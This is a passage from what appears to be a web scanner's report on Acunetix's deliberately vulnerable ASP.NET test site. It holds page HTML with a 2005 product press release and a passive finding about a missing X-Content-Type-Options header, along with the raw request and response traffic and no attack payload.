ICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3707 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,707 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi%2FTB7mR4IysbuEg0lOgmHIs
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 